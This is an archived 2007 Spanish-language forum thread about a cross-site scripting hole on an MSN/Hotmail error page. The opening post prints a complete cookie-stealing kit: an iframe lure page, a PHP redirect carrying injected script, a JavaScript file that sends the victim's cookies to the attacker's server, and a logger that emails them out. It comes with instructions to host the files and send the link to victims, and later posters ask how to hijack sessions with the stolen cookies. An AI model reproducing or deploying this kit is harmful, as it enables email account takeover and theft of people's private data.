PDA

Ver la versión completa : Grave bug en hotmail



School
23-03-2007, 17:14
Bueno estoy seguro de que este post será muy visitado jeje, como bien dice el título actualmente existe un gran bug en hotmail, tan grave que con solo pinchar en un enlace tu correo puede ser robado, este bug guarda las cookies de aquel que pinche en un enlace, de forma que son enviadas al correo que eligas(el tuyo vamos) y apartir de ahí facilmente puedes entrar al correo. Por favor si lo copiais no os olvideis la fuente, este bug era privado pero al parecer por un descuido salio a la luz.

Autor: _Antrax_
Web: www.c-group.org
Ya esta aceptado por Milw0rm aunque creo que aun no lo publicaron.

Exploit php

Index.php

Código:

<html>
<body>
<IFRAME SRC="http://www.xxxx.com/ind.php" WIDTH=10 HEIGHT=10>
<A HREF="ind.php">link</A>
</IFRAME>
</body></html>

ind.php

Código:

<?
$mysite = "http://www.xxxx.com/nice.js"; # <== Edit

$xpl = "http://moviles.es.msn.com/error.php?error=11&returnurl=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/nice.js%3E%3C/script%3E";
print '
<title>ASD</title>
<body bgcolor="ffffff">
<center>
<b></b><br>
<img src="asd.gif"></center>
<META HTTP-EQUIV="Refresh" CONTENT="1; URL='.$xpl.'">
';
?>


log.php

Código:

<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A");

$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("antrax_sverige@hotmail.com", $subject, $msg);

header ("location: asd.gif");
?>


nice.js

Código:

location.href='http://www.xxxx.com/log.php?nice='+escape(document.cookie)
reemplazar xxx.com por el sitio donde uno alojo los php ...

By Dario Struz
Greetz www.c-group.org Fr34k , penissmen , 4ur3v0ir , S4nt0!, DevilInsideTk , Putus , Inyexion , Bacan , Hanowars ,Chapinhack and Friends.

PD: Ahí teneís el codigo, simplemente armarlo con vuestros datos, subirlo a un ftp y enviar el enlace a alguien y recibireis es vuestro correo sus cookies.

Saludos An3urysm_

zeratul
30-03-2007, 09:41
Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias

School
30-03-2007, 23:54
Supuestamente no, el bug funciona te lo puedo asegurar, ya lo he probado y te llegan las cookies de la victima en cuanto ella pinche el enlace que le enviaste(5 min tarda).

Una vez te llegue usa como bien dijiste el proxomitron, te comento como usarlo por mp.

Que conste que yo no me dedico a robar correos de nadie, por que lo veo una estupidez, pero eso no significa que no pueda jajaj;)

Un saludo

clarinetista
31-03-2007, 20:55
Cada cual que haga lo que quiera con la info School, ese no es tu problema :)

PD: Gran aporte, de nuevo

School
01-04-2007, 03:37
Bueno s&#243;lo comentaros que este gran agujero de hotmail aun no han sido capaces de solucionarlo, simplemente te sale un cartelito diciendo que puede ser peligroso pinchar en enlaces, etc.
No me extra&#241;ar&#237;a que haya cambios en hotmail para darle una soluci&#243;n de verdad, sino al tanto.

Recalco que yo no me dedico a robar correos ni a joder webs ni nada de eso xD, pero creo que la informaci&#243;n debe estar al alcance de todos.

Saludos

j8k6f4v9j
03-04-2007, 13:28
Claro que s&#237;. Si yo tuviese informaci&#243;n m&#225;s o menos importante en una de esas cuentas (que no se dar&#225; el caso) querr&#237;a saber cuanto antes de este tipo de situaciones.

Gracias por el aporte

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

chico1988
06-04-2007, 12:16
no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias

Giskard
06-04-2007, 17:18
Supuestamente obtengo la cookie de la victima pro luego quisiera ke me ayudaras a iniciar sesion con esa cookie obtenida he intentado hacerlo con proxomitron pro no me funciona, espero tu ayuda, gracias


no se ninguna pagina web donde subir estos archivos ?. YO tambien quiero probar este bug. Gracias

Como ya saben, en este foro no ayudamos a "probar bugs de hotmail" (robar cuentas de correo). La valiosa información que dio School principalmente debe ser para prevenirnos y que no roben nuestros correos.

Si quieren probar este bug para ver si funciona, ya tienen el exploit y lo demás corre por su propia cuenta y responsabilidad.

Saludos

clarinetista
06-04-2007, 23:26
Giskard, de nuevo sabias palabras.
Es como si pides a los de milworm que te expliquen un exploit o te lo den compilao y rulando.

j8k6f4v9j
09-04-2007, 14:42
Que es casi como lo dan, otra cosa es que tambi&#233;n te hagan un programita que te vaya preguntando "&#191;D&#243;nde quieres recibir la info?" o "&#191;Cu&#225;l es la cuenta de la que la quieres?"

Salu2



http://img359.imageshack.us/img359/6631/celliigy4.pngKeep on Rollin' :mad:

chico1988
09-04-2007, 16:31
Teneis razon chicos perdonad mi pregunta

j8k6f4v9j
09-04-2007, 21:31
Teneis razon chicos perdonad mi pregunta

No necesitas disculparte, lo que ocurre es que este tipo de posts es caldo de cultivo para script kiddies que no respetan la intimidad ajena.

Salu2

http://img359.imageshack.us/img359/6631/celliigy4.png

Cypress
10-04-2007, 01:20
Pues.. no se si les paresca bien, pero... ya que est&#225; presentado el tema y discutido.
&#191; Por qu&#233; no cerrarlo ?

Por suerte todavia no han aparecido esos post que dicen: "me pueden sacar el pass de shashasha@hot... " y cosas as&#237;.

No se si les parece...

Saludos,
Cypress

clarinetista
10-04-2007, 15:38
Si, mejor cerrado